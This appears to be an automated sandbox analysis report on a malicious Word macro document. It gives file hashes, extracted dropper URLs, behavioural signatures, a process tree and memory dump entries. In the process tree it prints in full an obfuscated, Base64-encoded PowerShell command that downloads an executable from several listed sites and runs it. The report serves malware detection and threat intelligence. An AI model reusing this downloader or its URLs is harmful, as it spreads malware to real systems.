Analysis

  • max time kernel
    119s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    10/08/2024, 20:31

General

  • Target

    87909c2d2035f17ced120aca94c6cd8c_JaffaCakes118.doc

  • Size

    188KB

  • MD5

    87909c2d2035f17ced120aca94c6cd8c

  • SHA1

    e0c859aebe08b17ad22af891648b8601152ea605

  • SHA256

    28d8b1debd531ebe8e665f3c39a2ac24368f0bec5bdad18264416f150ac1b256

  • SHA512

    47cb980f83a25ccec6f379515f8a923a014f0435d04214a139d321595aff241121d88e891110f911eae5ed779f31cb8f736d4884fafd6351ee88b6fba74c07c2

  • SSDEEP

    3072:dA9ov+mLIX7wzt0HHDnwjacRHvvvvZs8gEmn:Sat0TwDRu8gEmn

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://techiweek.com/wp-includes/FW6/

exe.dropper

https://ravi-tools.com/js/1/

exe.dropper

https://providedigital.com/wp-admin/Igvi3l/

exe.dropper

https://nghiencauca.com/wp-includes/BOInu4E/

exe.dropper

http://jietuo66.com/hwqsv/oC/

exe.dropper

https://oklatu.com/wp-admin/i/

exe.dropper

https://blog.thejobstack.com/pmloibg/M/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\87909c2d2035f17ced120aca94c6cd8c_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2708
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2500
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
      POwersheLL -ENCOD JABSAHYAYgB1ADkAMABnAD0AKAAnAEoAJwArACgAJwByACcAKwAnADgAYQBkAHUAJwApACsAJwAzACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUATgBWADoAVQBTAEUAUgBQAFIAbwBmAEkAbABFAFwAZgAyAGMANAB4AHQAawBcAHkAcQBfAGkAYgB4AFAAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABJAFIARQBDAFQATwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBjAFUAUgBgAGkAdABZAGAAUAByAE8AVABPAGAAYwBgAE8AbAAiACAAPQAgACgAJwB0ACcAKwAnAGwAJwArACgAJwBzADEAMgAnACsAJwAsACAAJwApACsAKAAnAHQAbABzACcAKwAnADEAMQAsACAAJwArACcAdAAnACsAJwBsACcAKQArACcAcwAnACkAOwAkAEIAcwBtAHcAYgBiAHQAIAA9ACAAKAAnAFgAYgAnACsAKAAnAHUAJwArACcAcQBrACcAKQArACgAJwBsACcAKwAnAGYAegBvACcAKQApADsAJABCAGQAYQBvAGEAcABjAD0AKAAnAFkAJwArACcAcgAnACsAKAAnAF8AXwAnACsAJwBfAGoAdQAnACkAKQA7ACQARgB6ADIAXwB0AGEAdwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnAFcAJwArACcAbwA1AEYAJwApACsAKAAnADIAYwAnACsAJwA0ACcAKwAnAHgAdABrACcAKQArACcAVwBvACcAKwAoACcANQBZAHEAXwAnACsAJwBpAGIAeAAnACkAKwAoACcAcABXAG8AJwArACcANQAnACkAKQAuACIAUgBlAGAAUABsAEEAQwBFACIAKAAoACcAVwAnACsAJwBvADUAJwApACwAJwBcACcAKQApACsAJABCAHMAbQB3AGIAYgB0ACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABMAGcAeABqAGcAbgB6AD0AKAAnAEoAYQAnACsAJwBjAF8AJwArACgAJwAyACcAKwAnAG4AcAAnACkAKQA7ACQASgA0AG4AagBpAHoAOQA9ACYAKAAnAG4AJwArACcAZQAnACsAJwB3AC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAATgBlAFQALgBXAEUAYgBDAGwASQBFAG4AdAA7ACQAWQBfAHQAMABzAHEAZwA9ACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AJwApACsAJwB0ACcAKwAoACcAZQBjACcAKwAnAGgAaQB3AGUAZQBrACcAKQArACgAJwAuAGMAJwArACcAbwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGkAbgBjACcAKwAnAGwAdQBkACcAKQArACgAJwBlAHMALwBGAFcANgAnACsAJwAvACoAaAAnACsAJwB0ACcAKQArACgAJwB0AHAAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAcgAnACsAJwBhAHYAJwApACsAKAAnAGkAJwArACcALQB0AG8AbwBsAHMAJwArACcALgAnACkAKwAnAGMAbwAnACsAKAAnAG0AJwArACcALwBqAHMALwAxACcAKQArACcALwAqACcAKwAnAGgAdAAnACsAKAAnAHQAcAAnACsAJwBzADoALwAvACcAKQArACgAJwBwAHIAbwAnACsAJwB2AGkAJwApACsAJwBkACcAKwAoACcAZQBkAGkAJwArACcAZwAnACkAKwAoACcAaQB0AGEAbAAuACcAKwAnAGMAJwApACsAJwBvACcAKwAoACcAbQAvACcAKwAnAHcAJwApACsAJwBwACcAKwAoACcALQBhAGQAbQBpACcAKwAnAG4AJwArACcALwBJAGcAdgBpACcAKwAnADMAJwArACcAbAAnACkAKwAoACcALwAqAGgAJwArACcAdAAnACkAKwAnAHQAcAAnACsAKAAnAHMAOgAnACsAJwAvACcAKQArACgAJwAvAG4AJwArACcAZwAnACkAKwAnAGgAaQAnACsAKAAnAGUAbgBjACcAKwAnAGEAdQBjAGEALgAnACsAJwBjAG8AJwApACsAJwBtACcAKwAoACcALwB3AHAALQBpAG4AJwArACcAYwAnACsAJwBsACcAKQArACgAJwB1AGQAJwArACcAZQAnACkAKwAnAHMALwAnACsAJwBCAE8AJwArACgAJwBJAG4AdQAnACsAJwA0AEUALwAqAGgAJwApACsAKAAnAHQAdABwACcAKwAnADoAJwApACsAJwAvACcAKwAnAC8AJwArACgAJwBqACcAKwAnAGkAJwArACcAZQB0AHUAbwA2ADYALgBjAG8AJwArACcAbQAvAGgAJwApACsAKAAnAHcAJwArACcAcQBzAHYALwBvACcAKQArACgAJwBDAC8AJwArACcAKgAnACkAKwAnAGgAJwArACcAdAAnACsAKAAnAHQAcABzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBvAGsAbABhAHQAJwArACcAdQAnACkAKwAnAC4AYwAnACsAKAAnAG8AbQAvACcAKwAnAHcAJwApACsAJwBwACcAKwAoACcALQBhACcAKwAnAGQAbQBpAG4ALwAnACkAKwAoACcAaQAvACcAKwAnACoAJwApACsAKAAnAGgAdAB0ACcAKwAnAHAAcwA6AC8AJwArACcALwBiAGwAJwArACcAbwBnAC4AJwApACsAKAAnAHQAaABlAGoAbwBiAHMAdAAnACsAJwBhACcAKQArACcAYwAnACsAKAAnAGsALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACkAKwAnAHAAJwArACgAJwBtAGwAJwArACcAbwBpACcAKQArACcAYgAnACsAKAAnAGcAJwArACcALwBNACcAKQArACcALwAnACkALgAiAHMAUABsAGAAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQARABxADgAYwA4AF8AcgA9ACgAJwBZACcAKwAnADMAJwArACgAJwB4AGwAJwArACcAOAA4AGMAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABYAHAAMAAzAGcAbQBlACAAaQBuACAAJABZAF8AdAAwAHMAcQBnACkAewB0AHIAeQB7ACQASgA0AG4AagBpAHoAOQAuACIARABgAG8AYABXAG4ATABvAGAAQQBkAGYAaQBMAGUAIgAoACQAWABwADAAMwBnAG0AZQAsACAAJABGAHoAMgBfAHQAYQB3ACkAOwAkAFcAZgA3AF8AYwBmAG0APQAoACgAJwBLADgAYgAnACsAJwBfACcAKQArACcAbQAnACsAJwBkAHYAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAEYAegAyAF8AdABhAHcAKQAuACIATABlAGAATgBHAHQASAAiACAALQBnAGUAIAAzADEAMAAwADMAKQAgAHsALgAoACcASQAnACsAJwBuAHYAbwBrAGUALQAnACsAJwBJACcAKwAnAHQAZQBtACcAKQAoACQARgB6ADIAXwB0AGEAdwApADsAJABRADUAdABuAHIAaABxAD0AKAAnAEQAJwArACcAbQBvACcAKwAoACcAMgAnACsAJwBuAGgAcQAnACkAKQA7AGIAcgBlAGEAawA7ACQAVQBkAHYAcwBxAGwAYQA9ACgAJwBGAHkAJwArACgAJwBhACcAKwAnADAAcgAnACkAKwAnAGYANQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMAagBrAGMAdAA5AG8APQAoACcATAAnACsAKAAnAGoAOAA0ACcAKwAnADkAOQAnACsAJwBiACcAKQApAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1204

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            19KB

            MD5

            763572999dfd234feddb150daa71fd0d

            SHA1

            1f79cb47614a3b56fcf8713f7dc38cb23e2293b8

            SHA256

            88b4adf677330b5fcf22178293e0ddbe2baa52f0eb60b63db1253343e94ba1ef

            SHA512

            dfa1d4eacca005521bf1c112ec55c3e25c939cc3e22f06d819a5320dc8b79748f6b3dc658d724c193a62cf46b5ba45a0c4c3495b282e9156ec92b66ca060c8ee

          • memory/1204-53-0x000000001B6A0000-0x000000001B982000-memory.dmp

            Filesize

            2.9MB

          • memory/1204-54-0x00000000027F0000-0x00000000027F8000-memory.dmp

            Filesize

            32KB

          • memory/2708-19-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-39-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-38-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-9-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-8-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-29-0x00000000059D0000-0x0000000005AD0000-memory.dmp

            Filesize

            1024KB

          • memory/2708-28-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-21-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-0-0x000000002F891000-0x000000002F892000-memory.dmp

            Filesize

            4KB

          • memory/2708-18-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-17-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-16-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-14-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-13-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-12-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-11-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-10-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-44-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-46-0x00000000059D0000-0x0000000005AD0000-memory.dmp

            Filesize

            1024KB

          • memory/2708-45-0x00000000059D0000-0x0000000005AD0000-memory.dmp

            Filesize

            1024KB

          • memory/2708-7-0x00000000063C0000-0x00000000064C0000-memory.dmp

            Filesize

            1024KB

          • memory/2708-40-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-6-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-37-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-33-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-32-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-31-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-30-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-52-0x00000000059D0000-0x0000000005AD0000-memory.dmp

            Filesize

            1024KB

          • memory/2708-5-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-2-0x000000007147D000-0x0000000071488000-memory.dmp

            Filesize

            44KB

          • memory/2708-55-0x000000007147D000-0x0000000071488000-memory.dmp

            Filesize

            44KB

          • memory/2708-56-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-57-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-58-0x0000000000410000-0x0000000000510000-memory.dmp

            Filesize

            1024KB

          • memory/2708-59-0x00000000059D0000-0x0000000005AD0000-memory.dmp

            Filesize

            1024KB

          • memory/2708-60-0x00000000059D0000-0x0000000005AD0000-memory.dmp

            Filesize

            1024KB

          • memory/2708-61-0x00000000059D0000-0x0000000005AD0000-memory.dmp

            Filesize

            1024KB

          • memory/2708-62-0x00000000059D0000-0x0000000005AD0000-memory.dmp

            Filesize

            1024KB

          • memory/2708-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2708-79-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2708-80-0x000000007147D000-0x0000000071488000-memory.dmp

            Filesize

            44KB